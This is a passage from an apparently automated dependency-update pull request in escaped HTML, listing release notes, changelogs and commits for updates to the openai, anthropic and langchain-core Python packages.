href=\"https://github.com/openai/openai-python/compare/v2.38.0...v2.39.0\"\u003ev2.38.0...v2.39.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e workload identity in audit logs, additional_tools item in responses, fix ActionSearch.query to be optional. (\u003ca href=\"https://github.com/openai/openai-python/commit/ab60d7a52c310bb0490ff36b8bdc33b8d4ea725f\"\u003eab60d7a\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.38.0\u003c/h2\u003e\n\u003ch2\u003e2.38.0 (2026-05-21)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/openai/openai-python/compare/v2.37.0...v2.38.0\"\u003ev2.37.0...v2.38.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e api update (\u003ca href=\"https://github.com/openai/openai-python/commit/33d1d013250053886a73d178136e6bd1b09df059\"\u003e33d1d01\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e manual updates (\u003ca href=\"https://github.com/openai/openai-python/commit/a21700a2cd510cb9e6c88065ac8e942d4c041aa8\"\u003ea21700a\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e update OpenAPI spec or Stainless config (\u003ca href=\"https://github.com/openai/openai-python/commit/00265c5daba4d2481452ad35220f1556dab6bcf6\"\u003e00265c5\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChores\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e docs updates (\u003ca href=\"https://github.com/openai/openai-python/commit/ee101520d49e22c09cf8096f8cbb3848ea58a1f9\"\u003eee10152\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003echeck release PR custom code sync (\u003ca href=\"https://github.com/openai/openai-python/commit/2638779a5b8fffaa8fdb6eebc1d734f15d2491f8\"\u003e2638779\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove release automation trigger (\u003ca href=\"https://github.com/openai/openai-python/commit/bd6eea559f2996d914258a65e645981bdce3cad4\"\u003ebd6eea5\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003etrigger release automation (\u003ca href=\"https://github.com/openai/openai-python/commit/f62d08201eea8e08d4bb3385662f934d4adccb29\"\u003ef62d082\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.37.0\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/openai/openai-python/blob/main/CHANGELOG.md\"\u003eopenai's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.41.0 (2026-06-03)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/openai/openai-python/compare/v2.40.0...v2.41.0\"\u003ev2.40.0...v2.41.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e responses.moderation and chat_completions.moderation (\u003ca href=\"https://github.com/openai/openai-python/commit/87e46c25ac9ca8cff407b52ad9fb33e326c059d6\"\u003e87e46c2\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.40.0 (2026-06-01)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/openai/openai-python/compare/v2.39.0...v2.40.0\"\u003ev2.39.0...v2.40.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e Add Amazon Bedrock Responses support\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e allow setting bedrock api keys on the client directly (\u003ca href=\"https://github.com/openai/openai-python/commit/4d5bfdec37fa8a2b2a0413724755e586e627e28d\"\u003e4d5bfde\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.39.0 (2026-06-01)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/openai/openai-python/compare/v2.38.0...v2.39.0\"\u003ev2.38.0...v2.39.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e workload identity in audit logs, additional_tools item in responses, fix ActionSearch.query to be optional. (\u003ca href=\"https://github.com/openai/openai-python/commit/ab60d7a52c310bb0490ff36b8bdc33b8d4ea725f\"\u003eab60d7a\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.38.0 (2026-05-21)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/openai/openai-python/compare/v2.37.0...v2.38.0\"\u003ev2.37.0...v2.38.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e api update (\u003ca href=\"https://github.com/openai/openai-python/commit/33d1d013250053886a73d178136e6bd1b09df059\"\u003e33d1d01\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e manual updates (\u003ca href=\"https://github.com/openai/openai-python/commit/a21700a2cd510cb9e6c88065ac8e942d4c041aa8\"\u003ea21700a\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e update OpenAPI spec or Stainless config (\u003ca href=\"https://github.com/openai/openai-python/commit/00265c5daba4d2481452ad35220f1556dab6bcf6\"\u003e00265c5\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChores\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e docs updates (\u003ca href=\"https://github.com/openai/openai-python/commit/ee101520d49e22c09cf8096f8cbb3848ea58a1f9\"\u003eee10152\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003echeck release PR custom code sync (\u003ca href=\"https://github.com/openai/openai-python/commit/2638779a5b8fffaa8fdb6eebc1d734f15d2491f8\"\u003e2638779\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove release automation trigger (\u003ca href=\"https://github.com/openai/openai-python/commit/bd6eea559f2996d914258a65e645981bdce3cad4\"\u003ebd6eea5\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003etrigger release automation (\u003ca href=\"https://github.com/openai/openai-python/commit/f62d08201eea8e08d4bb3385662f934d4adccb29\"\u003ef62d082\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.37.0 (2026-05-13)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/openai/openai-python/compare/v2.36.0...v2.37.0\"\u003ev2.36.0...v2.37.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/openai/openai-python/commit/2d955a1ac69df0288b8072bbcd25905639e9b2ed\"\u003e\u003ccode\u003e2d955a1\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/openai/openai-python/issues/3359\"\u003e#3359\u003c/a\u003e from openai/release-please--branches--main--changes-...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/openai/openai-python/commit/519cd027919fa5b73bd8fe237e80c7a01b3e0b2f\"\u003e\u003ccode\u003e519cd02\u003c/code\u003e\u003c/a\u003e release: 2.41.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/openai/openai-python/commit/87e46c25ac9ca8cff407b52ad9fb33e326c059d6\"\u003e\u003ccode\u003e87e46c2\u003c/code\u003e\u003c/a\u003e feat(api): responses.moderation and chat_completions.moderation\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/openai/openai-python/commit/a28a3f6aa34f5ac6fcc2fafeb50112f2140c45ae\"\u003e\u003ccode\u003ea28a3f6\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/openai/openai-python/issues/3352\"\u003e#3352\u003c/a\u003e from openai/release-please--branches--main--changes-...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/openai/openai-python/commit/db6ccafa7b74b72caefbda6fb63bd5c904521770\"\u003e\u003ccode\u003edb6ccaf\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.md\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/openai/openai-python/commit/2264f700dad91e4f570eb7c0a6f10bbd22d34520\"\u003e\u003ccode\u003e2264f70\u003c/code\u003e\u003c/a\u003e release: 2.40.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/openai/openai-python/commit/4d5bfdec37fa8a2b2a0413724755e586e627e28d\"\u003e\u003ccode\u003e4d5bfde\u003c/code\u003e\u003c/a\u003e fix(api): allow setting bedrock api keys on the client directly\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/openai/openai-python/commit/ccef1436d9f52b5014597047e450eef543a87540\"\u003e\u003ccode\u003eccef143\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/openai/openai-python/issues/3326\"\u003e#3326\u003c/a\u003e from openai/codex/bedrock-responses-review\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/openai/openai-python/commit/a50ff0a19084306a09012ff85f730ea2c129eef9\"\u003e\u003ccode\u003ea50ff0a\u003c/code\u003e\u003c/a\u003e Fix Bedrock with_options overrides\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/openai/openai-python/commit/fdf4901e301fa01b368ede0b5b407dca42f07acc\"\u003e\u003ccode\u003efdf4901\u003c/code\u003e\u003c/a\u003e codegen metadata\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/openai/openai-python/compare/v2.32.0...v2.41.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `anthropic` from 0.96.0 to 0.107.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/releases\"\u003eanthropic's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.107.1\u003c/h2\u003e\n\u003ch2\u003e0.107.1 (2026-06-07)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/compare/v0.107.0...v0.107.1\"\u003ev0.107.0...v0.107.1\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003efoundry:\u003c/strong\u003e send x-api-key header for API-key auth (\u003ca href=\"https://redirect.github.com/anthropics/anthropic-sdk-python/issues/62\"\u003e#62\u003c/a\u003e) (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/13381413d22ad14d85e66836c67cc8a13bd2b7bd\"\u003e1338141\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/anthropics/anthropic-sdk-python/issues/1661\"\u003e#1661\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.107.0\u003c/h2\u003e\n\u003ch2\u003e0.107.0 (2026-06-06)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/compare/v0.106.0...v0.107.0\"\u003ev0.106.0...v0.107.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e small updates to Managed Agents types (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/72923f986f808597f86482a7eae4fba9a791e6ae\"\u003e72923f9\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.106.0\u003c/h2\u003e\n\u003ch2\u003e0.106.0 (2026-06-05)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/compare/v0.105.2...v0.106.0\"\u003ev0.105.2...v0.106.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e mark Claude Opus 4.1 as deprecated (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/85068cc4cb42feecb80a378942cec71e1baa8dcf\"\u003e85068cc\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eclient:\u003c/strong\u003e make Foundry client copy() and with_options() work (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/94146acdc1c6f66f187d5a42e4afbb911e692fe8\"\u003e94146ac\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003etransform schema:\u003c/strong\u003e preserve $defs when schema root is a $ref (\u003ca href=\"https://redirect.github.com/anthropics/anthropic-sdk-python/issues/1642\"\u003e#1642\u003c/a\u003e) (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/fc58e06b78407b447c50dfea109c6fb300f4b97d\"\u003efc58e06\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChores\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003einternal:\u003c/strong\u003e fix artifact url (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/a6ed0c4124d29989a568a27293dadf66e7ebcd6f\"\u003ea6ed0c4\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003einternal:\u003c/strong\u003e fix branch names (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/3b0337074f0bbab47bf7f5a2b76b4d240cff719a\"\u003e3b03370\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003einternal:\u003c/strong\u003e update private repo name (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/7dbcb05706f1865afeee62fb06e400f5c4bf619e\"\u003e7dbcb05\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDocumentation\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003epoint security reports to Anthropic's HackerOne program (\u003ca href=\"https://redirect.github.com/anthropics/anthropic-sdk-python/issues/10\"\u003e#10\u003c/a\u003e) (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/80f2c97b8e9534f9879945de11c11aba00cf8704\"\u003e80f2c97\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.105.2\u003c/h2\u003e\n\u003ch2\u003e0.105.2 (2026-05-29)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/compare/v0.105.1...v0.105.2\"\u003ev0.105.1...v0.105.2\u003c/a\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/blob/main/CHANGELOG.md\"\u003eanthropic's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.107.1 (2026-06-07)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/compare/v0.107.0...v0.107.1\"\u003ev0.107.0...v0.107.1\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003efoundry:\u003c/strong\u003e send x-api-key header for API-key auth (\u003ca href=\"https://redirect.github.com/anthropics/anthropic-sdk-python/issues/62\"\u003e#62\u003c/a\u003e) (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/13381413d22ad14d85e66836c67cc8a13bd2b7bd\"\u003e1338141\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/anthropics/anthropic-sdk-python/issues/1661\"\u003e#1661\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.107.0 (2026-06-06)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/compare/v0.106.0...v0.107.0\"\u003ev0.106.0...v0.107.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e small updates to Managed Agents types (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/72923f986f808597f86482a7eae4fba9a791e6ae\"\u003e72923f9\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.106.0 (2026-06-05)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/compare/v0.105.2...v0.106.0\"\u003ev0.105.2...v0.106.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e mark Claude Opus 4.1 as deprecated (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/85068cc4cb42feecb80a378942cec71e1baa8dcf\"\u003e85068cc\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eclient:\u003c/strong\u003e make Foundry client copy() and with_options() work (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/94146acdc1c6f66f187d5a42e4afbb911e692fe8\"\u003e94146ac\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003etransform schema:\u003c/strong\u003e preserve $defs when schema root is a $ref (\u003ca href=\"https://redirect.github.com/anthropics/anthropic-sdk-python/issues/1642\"\u003e#1642\u003c/a\u003e) (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/fc58e06b78407b447c50dfea109c6fb300f4b97d\"\u003efc58e06\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChores\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003einternal:\u003c/strong\u003e fix artifact url (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/a6ed0c4124d29989a568a27293dadf66e7ebcd6f\"\u003ea6ed0c4\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003einternal:\u003c/strong\u003e fix branch names (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/3b0337074f0bbab47bf7f5a2b76b4d240cff719a\"\u003e3b03370\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003einternal:\u003c/strong\u003e update private repo name (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/7dbcb05706f1865afeee62fb06e400f5c4bf619e\"\u003e7dbcb05\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDocumentation\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003epoint security reports to Anthropic's HackerOne program (\u003ca href=\"https://redirect.github.com/anthropics/anthropic-sdk-python/issues/10\"\u003e#10\u003c/a\u003e) (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/80f2c97b8e9534f9879945de11c11aba00cf8704\"\u003e80f2c97\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.105.2 (2026-05-29)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/compare/v0.105.1...v0.105.2\"\u003ev0.105.1...v0.105.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e0.105.1 (2026-05-29)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/compare/v0.105.0...v0.105.1\"\u003ev0.105.0...v0.105.1\u003c/a\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/260e687082dfe2d9b7f20199dc8ab7c9e90ae1de\"\u003e\u003ccode\u003e260e687\u003c/code\u003e\u003c/a\u003e release: 0.107.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/49c5395b93f5f38a299b88228964b8267394b9d1\"\u003e\u003ccode\u003e49c5395\u003c/code\u003e\u003c/a\u003e fix(foundry): send x-api-key header for API-key auth (\u003ca href=\"https://redirect.github.com/anthropics/anthropic-sdk-python/issues/62\"\u003e#62\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/4ceca722bedbd923671365f1a36f86d09fbec657\"\u003e\u003ccode\u003e4ceca72\u003c/code\u003e\u003c/a\u003e release: 0.107.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/3a6f9d9c217bdb504ddd229618149ab7e8033ad3\"\u003e\u003ccode\u003e3a6f9d9\u003c/code\u003e\u003c/a\u003e feat(api): small updates to Managed Agents types\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/6a70c9f72b16b04348564c5b92961a82ebe4b7da\"\u003e\u003ccode\u003e6a70c9f\u003c/code\u003e\u003c/a\u003e release: 0.106.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/8fa41c8acf6885fd8b7a0a67f705bbb9d3058672\"\u003e\u003ccode\u003e8fa41c8\u003c/code\u003e\u003c/a\u003e codegen metadata\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/1f553254640b45aecef37df0000da68dc2bcb9c5\"\u003e\u003ccode\u003e1f55325\u003c/code\u003e\u003c/a\u003e Don't leak ANTHROPIC_API_KEY to the Foundry endpoint (\u003ca href=\"https://redirect.github.com/anthropics/anthropic-sdk-python/issues/18\"\u003e#18\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/a94498c6aa3dd4e237ed72dacdd26336bbd7d9fc\"\u003e\u003ccode\u003ea94498c\u003c/code\u003e\u003c/a\u003e fix(client): make Foundry client copy() and with_options() work\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/907d849f8dfec50dfeda06b5cdde0ee268f9b7f9\"\u003e\u003ccode\u003e907d849\u003c/code\u003e\u003c/a\u003e chore(internal): fix artifact url\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/9676a5d0d40162a385001f60aa136f97b2718309\"\u003e\u003ccode\u003e9676a5d\u003c/code\u003e\u003c/a\u003e docs: point security reports to Anthropic's HackerOne program (\u003ca href=\"https://redirect.github.com/anthropics/anthropic-sdk-python/issues/10\"\u003e#10\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/compare/v0.96.0...v0.107.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `langchain-core` from 1.4.0 to 1.4.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/langchain-ai/langchain/releases\"\u003elangchain-core's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003elangchain-core==1.4.1\u003c/h2\u003e\n\u003cp\u003eChanges since langchain-core==1.4.0\u003c/p\u003e\n\u003cp\u003erelease(core): 1.4.1 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37922\"\u003e#37922\u003c/a\u003e)\nfix(core): remove Bedrock prevalidation from \u003ccode\u003eload\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37909\"\u003e#37909\u003c/a\u003e)\ndocs(core): expand and link \u003ccode\u003eModelProfile\u003c/code\u003e docstrings (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37904\"\u003e#37904\u003c/a\u003e)\nrelease(anthropic): 1.4.4 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37757\"\u003e#37757\u003c/a\u003e)\nchore(core): bump \u003ccode\u003euuid-utils\u003c/code\u003e to 0.16.0 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37699\"\u003e#37699\u003c/a\u003e)\nchore(infra): bump \u003ccode\u003elangchain-tests\u003c/code\u003e floor to 1.1.9 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37610\"\u003e#37610\u003c/a\u003e)\nrelease(standard-tests): 1.1.9 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37609\"\u003e#37609\u003c/a\u003e)\nchore: bump idna from 3.11 to 3.15 in /libs/core (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37539\"\u003e#37539\u003c/a\u003e)\nci(infra): harden Dependabot version-bound preservation (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37510\"\u003e#37510\u003c/a\u003e)\nhotfix: bump lockfiles (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37508\"\u003e#37508\u003c/a\u003e)\ndocs(core): note override for \u003ccode\u003e_get_ls_params\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37503\"\u003e#37503\u003c/a\u003e)\nchore(core,langchain,openai): refresh stale OpenAI model references (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37487\"\u003e#37487\u003c/a\u003e)\nchore: bump langsmith from 0.7.31 to 0.8.0 in /libs/core (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37395\"\u003e#37395\u003c/a\u003e)\nfix(core): accept \u003ccode\u003eSerializable\u003c/code\u003e constructor-envelope wire shape in \u003ccode\u003e_convert_to_message\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37456\"\u003e#37456\u003c/a\u003e)\nfix(core): preserve chunk \u003ccode\u003eadditional_kwargs\u003c/code\u003e across v3 stream assembly (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37435\"\u003e#37435\u003c/a\u003e)\nfix(core): preserve reasoning blocks alongside tool_call in v3 stream (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37434\"\u003e#37434\u003c/a\u003e)\nchore: bump jupyter-server from 2.17.0 to 2.18.0 in /libs/core (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37354\"\u003e#37354\u003c/a\u003e)\nchore: bump mistune from 3.1.4 to 3.2.1 in /libs/core (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37353\"\u003e#37353\u003c/a\u003e)\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/a401351e12b9a3e1670314adf2f7bbcf8811903c\"\u003e\u003ccode\u003ea401351\u003c/code\u003e\u003c/a\u003e release(core): 1.4.1 (\u003ca 